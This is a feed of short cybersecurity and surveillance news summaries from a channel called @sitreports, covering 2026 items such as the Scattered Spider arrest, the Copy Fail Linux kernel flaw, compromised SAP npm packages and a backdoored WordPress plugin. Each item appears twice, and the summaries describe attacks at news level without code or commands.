🔫 US charges Scattered Spider member arrested in Finland
A 19-year-old dual US-Estonian citizen using the alias "Bouquet" faces federal wire fraud and computer intrusion charges after Finnish authorities arrested him at Helsinki airport on April 10. According to Chicago Tribune reporting, temporarily unsealed court records link him to at least four Scattered Spider breaches, including attacks conducted when he was 16 years old.
The complaint details involvement in multi-million dollar extortion campaigns against corporations, including a luxury retailer hit with an $8 million ransom demand in May 2025. The financially motivated collective, known for social engineering and MFA bombing tactics, has previously breached Caesars, MGM Resorts, and multiple UK retailers.
🛰️ Open sources - closed narratives
@sitreports
A 19-year-old dual US-Estonian citizen using the alias "Bouquet" faces federal wire fraud and computer intrusion charges after Finnish authorities arrested him at Helsinki airport on April 10. According to Chicago Tribune reporting, temporarily unsealed court records link him to at least four Scattered Spider breaches, including attacks conducted when he was 16 years old.
The complaint details involvement in multi-million dollar extortion campaigns against corporations, including a luxury retailer hit with an $8 million ransom demand in May 2025. The financially motivated collective, known for social engineering and MFA bombing tactics, has previously breached Caesars, MGM Resorts, and multiple UK retailers.
🛰️ Open sources - closed narratives
@sitreports
🤖 Kamasers Botnet Combines DDoS and Ransomware Delivery
A newly analyzed DDoS botnet named Kamasers has been observed combining multi-vector distributed denial-of-service capabilities with malware loader functions that enable ransomware deployment and data theft. Research by ANY.RUN reveals the malware spreads via GCleaner and Amadey loaders, with control infrastructure hosted on Railnet LLC ASN—previously linked to bulletproof hosting operations.
Kamasers employs a Dead Drop Resolver mechanism using GitHub Gist, Telegram, and Dropbox to dynamically retrieve C2 addresses, evading static detection. Spanish-language commands observed in sessions suggest operator origins, while targeting spans Germany, U.S., Poland, and France across education, telecom, and tech sectors.
🛰️ Open sources - closed narratives
@sitreports
A newly analyzed DDoS botnet named Kamasers has been observed combining multi-vector distributed denial-of-service capabilities with malware loader functions that enable ransomware deployment and data theft. Research by ANY.RUN reveals the malware spreads via GCleaner and Amadey loaders, with control infrastructure hosted on Railnet LLC ASN—previously linked to bulletproof hosting operations.
Kamasers employs a Dead Drop Resolver mechanism using GitHub Gist, Telegram, and Dropbox to dynamically retrieve C2 addresses, evading static detection. Spanish-language commands observed in sessions suggest operator origins, while targeting spans Germany, U.S., Poland, and France across education, telecom, and tech sectors.
🛰️ Open sources - closed narratives
@sitreports
📄 Checkmarx Confirms LAPSUS$ Data Leak Following GitHub Breach
Application security firm Checkmarx has confirmed that LAPSUS$ threat actors leaked 96GB of data stolen from its private GitHub repository. The breach originated from a March 23 compromise linked to the Trivy supply-chain attack, where stolen credentials enabled unauthorized access. The attackers published malicious code and Docker images on April 22 before releasing the stolen data on both dark web and clearnet portals.
The incident highlights how downstream credential theft enabled persistent access across multiple organizations. Checkmarx states no customer data was stored in the affected repository, though forensic investigation continues. The company has blocked repository access pending completion of the probe.
🛰️ Open sources - closed narratives
@sitreports
Application security firm Checkmarx has confirmed that LAPSUS$ threat actors leaked 96GB of data stolen from its private GitHub repository. The breach originated from a March 23 compromise linked to the Trivy supply-chain attack, where stolen credentials enabled unauthorized access. The attackers published malicious code and Docker images on April 22 before releasing the stolen data on both dark web and clearnet portals.
The incident highlights how downstream credential theft enabled persistent access across multiple organizations. Checkmarx states no customer data was stored in the affected repository, though forensic investigation continues. The company has blocked repository access pending completion of the probe.
🛰️ Open sources - closed narratives
@sitreports
🎭 Signal Phishing Campaign Targets German Political Elite
German prosecutors have launched an espionage investigation into a large-scale phishing operation targeting hundreds of Signal accounts belonging to politicians, ministers, military personnel, and journalists. Attackers impersonated Signal support or trusted contacts to trick victims into sharing authentication codes or scanning malicious QR codes, gaining access to private communications. High-profile targets included CDU politician Julia Klöckner, while German authorities suspect Russian state involvement.
The campaign exploited human trust rather than technical vulnerabilities, bypassing encryption through social engineering.
🛰️ Open sources - closed narratives
@sitreports
German prosecutors have launched an espionage investigation into a large-scale phishing operation targeting hundreds of Signal accounts belonging to politicians, ministers, military personnel, and journalists. Attackers impersonated Signal support or trusted contacts to trick victims into sharing authentication codes or scanning malicious QR codes, gaining access to private communications. High-profile targets included CDU politician Julia Klöckner, while German authorities suspect Russian state involvement.
The campaign exploited human trust rather than technical vulnerabilities, bypassing encryption through social engineering.
🛰️ Open sources - closed narratives
@sitreports
🔫 Linux Kernel Flaw Enables 10-Line Root Exploit
A local privilege escalation vulnerability dubbed Copy Fail (CVE-2026-31431) allows unprivileged users to gain root access on most Linux distributions released since 2017. The flaw in the kernel's cryptographic template permits writing controlled bytes into any readable file's page cache, modifying binaries during execution without triggering filesystem defenses. A functional exploit is just 732 bytes of Python code.
Major distributions including Debian, Ubuntu, and SUSE have deployed patches for the high-severity flaw, identified with AI-assisted scanning by Theori. While requiring local access, the vulnerability presents container escape risks in Kubernetes environments due to shared page cache architecture.
🛰️ Open sources - closed narratives
@sitreports
A local privilege escalation vulnerability dubbed Copy Fail (CVE-2026-31431) allows unprivileged users to gain root access on most Linux distributions released since 2017. The flaw in the kernel's cryptographic template permits writing controlled bytes into any readable file's page cache, modifying binaries during execution without triggering filesystem defenses. A functional exploit is just 732 bytes of Python code.
Major distributions including Debian, Ubuntu, and SUSE have deployed patches for the high-severity flaw, identified with AI-assisted scanning by Theori. While requiring local access, the vulnerability presents container escape risks in Kubernetes environments due to shared page cache architecture.
🛰️ Open sources - closed narratives
@sitreports
🔫 SAP npm Packages Compromised in TeamPCP Supply Chain Attack
Four official SAP npm packages—@cap-js/sqlite, @cap-js/postgres, @cap-js/db-service, and mbt—were compromised to deploy credential-stealing malware targeting developers and CI/CD environments. According to security researchers, malicious preinstall scripts downloaded obfuscated payloads that exfiltrated npm tokens, GitHub credentials, SSH keys, cloud provider credentials, and Kubernetes secrets from CI runner memory, uploading encrypted data to GitHub repositories marked "A Mini Shai-Hulud has Appeared."
The attack shows medium-confidence attribution to TeamPCP threat actors, using tactics identical to previous Bitwarden, Trivy, and Checkmarx compromises.
🛰️ Open sources - closed narratives
@sitreports
Four official SAP npm packages—@cap-js/sqlite, @cap-js/postgres, @cap-js/db-service, and mbt—were compromised to deploy credential-stealing malware targeting developers and CI/CD environments. According to security researchers, malicious preinstall scripts downloaded obfuscated payloads that exfiltrated npm tokens, GitHub credentials, SSH keys, cloud provider credentials, and Kubernetes secrets from CI runner memory, uploading encrypted data to GitHub repositories marked "A Mini Shai-Hulud has Appeared."
The attack shows medium-confidence attribution to TeamPCP threat actors, using tactics identical to previous Bitwarden, Trivy, and Checkmarx compromises.
🛰️ Open sources - closed narratives
@sitreports
🔫 WordPress Plugin Harbored Five-Year Backdoor
Quick Page/Post Redirect, installed on over 70,000 WordPress sites, contained a hidden backdoor introduced in 2020-2021 versions that enabled remote code execution. Researcher Austin Ginder discovered the malware after infections triggered alerts across his hosting fleet, revealing that versions 5.2.1 and 5.2.2 included a self-update mechanism pointing to an external domain that pushed compromised code outside WordPress.org controls.
The backdoor remained dormant for years, primarily functioning as a parasite SEO operation affecting logged-out users. Though the malicious C2 subdomain no longer resolves, the update mechanism persists on affected installations, presenting ongoing arbitrary code execution risk if reactivated.
🛰️ Open sources - closed narratives
@sitreports
Quick Page/Post Redirect, installed on over 70,000 WordPress sites, contained a hidden backdoor introduced in 2020-2021 versions that enabled remote code execution. Researcher Austin Ginder discovered the malware after infections triggered alerts across his hosting fleet, revealing that versions 5.2.1 and 5.2.2 included a self-update mechanism pointing to an external domain that pushed compromised code outside WordPress.org controls.
The backdoor remained dormant for years, primarily functioning as a parasite SEO operation affecting logged-out users. Though the malicious C2 subdomain no longer resolves, the update mechanism persists on affected installations, presenting ongoing arbitrary code execution risk if reactivated.
🛰️ Open sources - closed narratives
@sitreports
📡 Oak Ridge Lab Develops Portable GPS Interference Detector
Oak Ridge National Laboratory unveiled a portable device capable of detecting GPS spoofing and jamming attacks on commercial vehicles. The system uses a software-defined radio and embedded GPU running novel RF analysis algorithms to distinguish authentic satellite signals from malicious ones, even when both are equal in strength. Testing with DHS showed the device outperforms existing commercial systems while operating independently of GPS infrastructure.
The technology addresses growing threats to logistics networks, including cargo theft operations that exploit spoofed location data to misdirect high-value shipments. Researchers are now working to reduce production costs for wider deployment across the trucking industry.
🛰️ Open sources - closed narratives
@sitreports
Oak Ridge National Laboratory unveiled a portable device capable of detecting GPS spoofing and jamming attacks on commercial vehicles. The system uses a software-defined radio and embedded GPU running novel RF analysis algorithms to distinguish authentic satellite signals from malicious ones, even when both are equal in strength. Testing with DHS showed the device outperforms existing commercial systems while operating independently of GPS infrastructure.
The technology addresses growing threats to logistics networks, including cargo theft operations that exploit spoofed location data to misdirect high-value shipments. Researchers are now working to reduce production costs for wider deployment across the trucking industry.
🛰️ Open sources - closed narratives
@sitreports
🔫 LiteLLM SQL Injection Exploited Within 36 Hours of Disclosure
A critical SQL injection vulnerability in LiteLLM (CVE-2026-42208) was exploited just 36 hours after public disclosure. The flaw, affecting versions 1.81.16 to 1.83.6, allows unauthenticated attackers to manipulate database queries through crafted Authorization headers, potentially accessing or modifying sensitive credentials and API keys. The vulnerability was patched in version 1.83.7 on April 19, 2026.
The Sysdig Threat Research Team observed targeted exploitation attempts demonstrating precise knowledge of LiteLLM's database schema. Unlike typical automated attacks, according to the researchers, the intrusion showed deliberate enumeration efforts, though no evidence of data exfiltration or credential reuse was detected.
🛰️ Open sources - closed narratives
@sitreports
A critical SQL injection vulnerability in LiteLLM (CVE-2026-42208) was exploited just 36 hours after public disclosure. The flaw, affecting versions 1.81.16 to 1.83.6, allows unauthenticated attackers to manipulate database queries through crafted Authorization headers, potentially accessing or modifying sensitive credentials and API keys. The vulnerability was patched in version 1.83.7 on April 19, 2026.
The Sysdig Threat Research Team observed targeted exploitation attempts demonstrating precise knowledge of LiteLLM's database schema. Unlike typical automated attacks, according to the researchers, the intrusion showed deliberate enumeration efforts, though no evidence of data exfiltration or credential reuse was detected.
🛰️ Open sources - closed narratives
@sitreports
🤖 Pentagon to Establish Sub-Unified Command for Autonomous Warfare
Secretary of Defense Pete Hegseth announced the U.S. military will soon designate a sub-unified command focused on autonomous warfare, citing the central role of drones in modern combat. The move follows U.S. Southern Command's recent launch of its Autonomous Warfare Command. Hegseth emphasized lessons from Ukraine and Operation Epic Fury as drivers behind the decision.
The Pentagon's fiscal 2027 budget requests $54 billion for autonomous systems, including $39.2 billion for "Drone Dominance" initiatives. Sub-unified command status signals enduring priority, placing autonomous warfare alongside elite structures like Joint Special Operations Command.
🛰️ Open sources - closed narratives
@sitreports
Secretary of Defense Pete Hegseth announced the U.S. military will soon designate a sub-unified command focused on autonomous warfare, citing the central role of drones in modern combat. The move follows U.S. Southern Command's recent launch of its Autonomous Warfare Command. Hegseth emphasized lessons from Ukraine and Operation Epic Fury as drivers behind the decision.
The Pentagon's fiscal 2027 budget requests $54 billion for autonomous systems, including $39.2 billion for "Drone Dominance" initiatives. Sub-unified command status signals enduring priority, placing autonomous warfare alongside elite structures like Joint Special Operations Command.
🛰️ Open sources - closed narratives
@sitreports
🔫 Microsoft Incomplete Patch Spawns New Windows Zero-Day Under Active Exploitation
Microsoft's February fix for CVE-2026-21510, a Windows Shell flaw exploited by Russia's APT28 against Ukraine and EU targets, failed to close a critical authentication coercion vector. The incomplete patch led to CVE-2026-32202, now actively exploited and flagged by CISA's Known Exploited Vulnerabilities catalog with a May 12 federal remediation deadline. The zero-click flaw enables attackers to harvest Net-NTLMv2 hashes via auto-parsed LNK files.
Akamai researchers discovered victim machines still authenticating to attacker servers despite the original RCE fix. The vulnerability permits credential theft and lateral movement without user interaction, representing a credential theft vector directly descended from APT28's original exploit chain.
🛰️ Open sources - closed narratives
@sitreports
Microsoft's February fix for CVE-2026-21510, a Windows Shell flaw exploited by Russia's APT28 against Ukraine and EU targets, failed to close a critical authentication coercion vector. The incomplete patch led to CVE-2026-32202, now actively exploited and flagged by CISA's Known Exploited Vulnerabilities catalog with a May 12 federal remediation deadline. The zero-click flaw enables attackers to harvest Net-NTLMv2 hashes via auto-parsed LNK files.
Akamai researchers discovered victim machines still authenticating to attacker servers despite the original RCE fix. The vulnerability permits credential theft and lateral movement without user interaction, representing a credential theft vector directly descended from APT28's original exploit chain.
🛰️ Open sources - closed narratives
@sitreports
🔍 SAP npm Packages Compromised in Supply Chain Attack
Multiple SAP-related npm packages have been compromised with credential-stealing malware dubbed "Mini Shai-Hulud." The malicious code was injected into legitimate packages used by developers working with SAP systems, enabling attackers to exfiltrate authentication credentials from affected development environments.
The compromise targets the npm supply chain, a critical vector given SAP's widespread enterprise adoption. Organizations using affected packages face immediate exposure risk to credential theft, potentially granting attackers access to corporate SAP environments and sensitive business data.
🛰️ Open sources - closed narratives
@sitreports
Multiple SAP-related npm packages have been compromised with credential-stealing malware dubbed "Mini Shai-Hulud." The malicious code was injected into legitimate packages used by developers working with SAP systems, enabling attackers to exfiltrate authentication credentials from affected development environments.
The compromise targets the npm supply chain, a critical vector given SAP's widespread enterprise adoption. Organizations using affected packages face immediate exposure risk to credential theft, potentially granting attackers access to corporate SAP environments and sensitive business data.
🛰️ Open sources - closed narratives
@sitreports
🔍 NSA-Developed OT Tool Contains XML External Entity Vulnerability
CISA issued advisory on CVE-2026-6807, an XXE vulnerability affecting all versions of GrassMarlin, an NSA-developed network security tool for critical infrastructure and SCADA networks that reached end-of-life in 2017. The flaw stems from insufficient XML parsing hardening in session files, enabling data exfiltration through maliciously crafted .gm3 archives. According to reporting, exploitation requires tricking users into opening weaponized files, with a public PoC demonstrating base64-encoded exfiltration.
No patches forthcoming due to EOL status. CISA recommends network isolation and access hardening. Threat vector limited to phishing scenarios, reducing immediate risk to organizations with mature security awareness programs.
🛰️ Open sources - closed narratives
@sitreports
CISA issued advisory on CVE-2026-6807, an XXE vulnerability affecting all versions of GrassMarlin, an NSA-developed network security tool for critical infrastructure and SCADA networks that reached end-of-life in 2017. The flaw stems from insufficient XML parsing hardening in session files, enabling data exfiltration through maliciously crafted .gm3 archives. According to reporting, exploitation requires tricking users into opening weaponized files, with a public PoC demonstrating base64-encoded exfiltration.
No patches forthcoming due to EOL status. CISA recommends network isolation and access hardening. Threat vector limited to phishing scenarios, reducing immediate risk to organizations with mature security awareness programs.
🛰️ Open sources - closed narratives
@sitreports
🤖 DPRK Actors Deploy AI-Generated npm Packages in Developer Supply Chain Campaign
North Korean threat actors are distributing malware through npm packages with AI-generated code, alongside fake recruitment firms targeting software developers. The campaign employs remote access trojans to compromise victims through social engineering tactics focused on employment opportunities.
The operation demonstrates continued evolution of DPRK supply chain targeting methods, combining automated code generation with established social engineering frameworks. Developer-focused attack vectors remain a priority objective for revenue generation operations linked to Pyongyang-affiliated groups.
🛰️ Open sources - closed narratives
@sitreports
North Korean threat actors are distributing malware through npm packages with AI-generated code, alongside fake recruitment firms targeting software developers. The campaign employs remote access trojans to compromise victims through social engineering tactics focused on employment opportunities.
The operation demonstrates continued evolution of DPRK supply chain targeting methods, combining automated code generation with established social engineering frameworks. Developer-focused attack vectors remain a priority objective for revenue generation operations linked to Pyongyang-affiliated groups.
🛰️ Open sources - closed narratives
@sitreports
🔍 DHS Expanding Predator Drone Fleet for Domestic Surveillance
Customs and Border Protection plans to spend hundreds of millions of dollars on additional high-powered surveillance drones, with other DHS components potentially launching their own MQ-9 fleets, according to procurement records reviewed by 404 Media.
The expansion signals broader integration of military-grade aerial surveillance capabilities across DHS operations beyond traditional border monitoring, potentially establishing parallel drone infrastructure within multiple agency branches.
🛰️ Open sources - closed narratives
@sitreports
Customs and Border Protection plans to spend hundreds of millions of dollars on additional high-powered surveillance drones, with other DHS components potentially launching their own MQ-9 fleets, according to procurement records reviewed by 404 Media.
The expansion signals broader integration of military-grade aerial surveillance capabilities across DHS operations beyond traditional border monitoring, potentially establishing parallel drone infrastructure within multiple agency branches.
🛰️ Open sources - closed narratives
@sitreports
🤖 LinkedIn AI Hiring Agents Project $450M Annual Revenue
Microsoft-owned LinkedIn announced its agentic AI hiring products are projected to generate $450 million in sales over the next year, according to company statements. The platform's AI agents automate recruitment workflows for corporate clients.
The revenue projection signals rapid enterprise adoption of autonomous AI systems in talent acquisition, positioning LinkedIn to capture significant market share in HR automation. Microsoft's integration strategy appears focused on high-margin B2B services rather than consumer-facing AI products.
🛰️ Open sources - closed narratives
@sitreports
Microsoft-owned LinkedIn announced its agentic AI hiring products are projected to generate $450 million in sales over the next year, according to company statements. The platform's AI agents automate recruitment workflows for corporate clients.
The revenue projection signals rapid enterprise adoption of autonomous AI systems in talent acquisition, positioning LinkedIn to capture significant market share in HR automation. Microsoft's integration strategy appears focused on high-margin B2B services rather than consumer-facing AI products.
🛰️ Open sources - closed narratives
@sitreports
📡 House Speaker Leverages Crypto Provisions to Secure FISA Reauthorization Votes
Speaker Mike Johnson secured Freedom Caucus support for FISA Section 702 renewal by incorporating cryptocurrency-friendly language into the surveillance legislation package, according to reporting by The Intercept. The tactical bundling paired expanded domestic surveillance authorities with reduced regulatory oversight on digital assets.
The legislative strategy faces Senate obstacles where crypto provisions are unlikely to survive committee review, potentially forcing a clean FISA vote. This marks a notable shift in coalition-building tactics where domestic surveillance expansion now requires incentive structures beyond traditional security framing.
🛰️ Open sources - closed narratives
@sitreports
Speaker Mike Johnson secured Freedom Caucus support for FISA Section 702 renewal by incorporating cryptocurrency-friendly language into the surveillance legislation package, according to reporting by The Intercept. The tactical bundling paired expanded domestic surveillance authorities with reduced regulatory oversight on digital assets.
The legislative strategy faces Senate obstacles where crypto provisions are unlikely to survive committee review, potentially forcing a clean FISA vote. This marks a notable shift in coalition-building tactics where domestic surveillance expansion now requires incentive structures beyond traditional security framing.
🛰️ Open sources - closed narratives
@sitreports
🔫 Copy Fail: Linux kernel LPE enables root via 10-line Python script
CVE-2026-31431, dubbed Copy Fail, exploits a flaw in Linux kernel's authencesn cryptographic template allowing unprivileged users to write four controlled bytes into any readable file's page cache. A 732-byte Python exploit can modify setuid binaries to gain root access on nearly all distributions since 2017. Theori researchers identified the vulnerability with AI-assisted scanning, and major distributions have issued patches rated 7.8/10 severity.
Unlike Dirty Cow or Dirty Pipe, the exploit requires no race condition. Primary risk vectors include multi-tenant systems, shared-kernel containers, and CI/CD pipelines executing untrusted code. The page cache sharing mechanism creates potential Kubernetes node escape primitives, expanding impact beyond local privilege escalation scenarios.
🛰️ Open sources - closed narratives
@sitreports
CVE-2026-31431, dubbed Copy Fail, exploits a flaw in Linux kernel's authencesn cryptographic template allowing unprivileged users to write four controlled bytes into any readable file's page cache. A 732-byte Python exploit can modify setuid binaries to gain root access on nearly all distributions since 2017. Theori researchers identified the vulnerability with AI-assisted scanning, and major distributions have issued patches rated 7.8/10 severity.
Unlike Dirty Cow or Dirty Pipe, the exploit requires no race condition. Primary risk vectors include multi-tenant systems, shared-kernel containers, and CI/CD pipelines executing untrusted code. The page cache sharing mechanism creates potential Kubernetes node escape primitives, expanding impact beyond local privilege escalation scenarios.
🛰️ Open sources - closed narratives
@sitreports
🔫 SAP npm Packages Compromised in TeamPCP Supply Chain Attack
Four official SAP npm packages were compromised to deploy credential-stealing malware targeting developers and CI/CD pipelines. The affected packages—@cap-js/sqlite, @cap-js/postgres, @cap-js/db-service, and mbt—contained malicious preinstall scripts that extracted npm tokens, SSH keys, cloud credentials, and CI/CD secrets. The malware read runner process memory to bypass security masking and self-propagated by injecting code into other packages using stolen credentials, according to security researchers.
The attack bears medium-confidence attribution to TeamPCP threat actors, who previously compromised Bitwarden and Checkmarx packages using similar tactics.
🛰️ Open sources - closed narratives
@sitreports
Four official SAP npm packages were compromised to deploy credential-stealing malware targeting developers and CI/CD pipelines. The affected packages—@cap-js/sqlite, @cap-js/postgres, @cap-js/db-service, and mbt—contained malicious preinstall scripts that extracted npm tokens, SSH keys, cloud credentials, and CI/CD secrets. The malware read runner process memory to bypass security masking and self-propagated by injecting code into other packages using stolen credentials, according to security researchers.
The attack bears medium-confidence attribution to TeamPCP threat actors, who previously compromised Bitwarden and Checkmarx packages using similar tactics.
🛰️ Open sources - closed narratives
@sitreports
🔫 WordPress Plugin Harbored Five-Year Backdoor
Quick Page/Post Redirect plugin, active on over 70,000 WordPress sites, contained a hidden backdoor since 2020 that enabled remote code execution via external update servers. Versions 5.2.1 and 5.2.2 included a self-update mechanism pointing to third-party domain 'anadnet.com', which pushed tampered builds outside WordPress.org's oversight. The backdoor delivered SEO spam to logged-out visitors while maintaining persistent update hooks to attacker infrastructure, according to security researcher Austin Ginder.
WordPress.org has suspended the plugin pending review, leaving 70,000 sites with update checks still pointing to attacker infrastructure despite the dormant command-and-control subdomain no longer resolving.
🛰️ Open sources - closed narratives
@sitreports
Quick Page/Post Redirect plugin, active on over 70,000 WordPress sites, contained a hidden backdoor since 2020 that enabled remote code execution via external update servers. Versions 5.2.1 and 5.2.2 included a self-update mechanism pointing to third-party domain 'anadnet.com', which pushed tampered builds outside WordPress.org's oversight. The backdoor delivered SEO spam to logged-out visitors while maintaining persistent update hooks to attacker infrastructure, according to security researcher Austin Ginder.
WordPress.org has suspended the plugin pending review, leaving 70,000 sites with update checks still pointing to attacker infrastructure despite the dormant command-and-control subdomain no longer resolving.
🛰️ Open sources - closed narratives
@sitreports
📡 ORNL develops portable GPS spoofing detector with equal-strength detection capability
Oak Ridge National Laboratory researchers led by Austin Albright have developed a portable GPS interference detection system capable of identifying both jamming and spoofing attacks. The device uses a software-defined radio and embedded GPU running novel RF analysis algorithms. Critically, according to reporting, the system can detect spoofing even when fake and real signals are equally strong—a capability no known detector currently possesses.
With successful DHS testing for commercial trucking complete, the team is pursuing cost reduction to enable broader deployment across logistics and critical cargo transport sectors where GPS manipulation poses growing operational risks.
🛰️ Open sources - closed narratives
@sitreports
Oak Ridge National Laboratory researchers led by Austin Albright have developed a portable GPS interference detection system capable of identifying both jamming and spoofing attacks. The device uses a software-defined radio and embedded GPU running novel RF analysis algorithms. Critically, according to reporting, the system can detect spoofing even when fake and real signals are equally strong—a capability no known detector currently possesses.
With successful DHS testing for commercial trucking complete, the team is pursuing cost reduction to enable broader deployment across logistics and critical cargo transport sectors where GPS manipulation poses growing operational risks.
🛰️ Open sources - closed narratives
@sitreports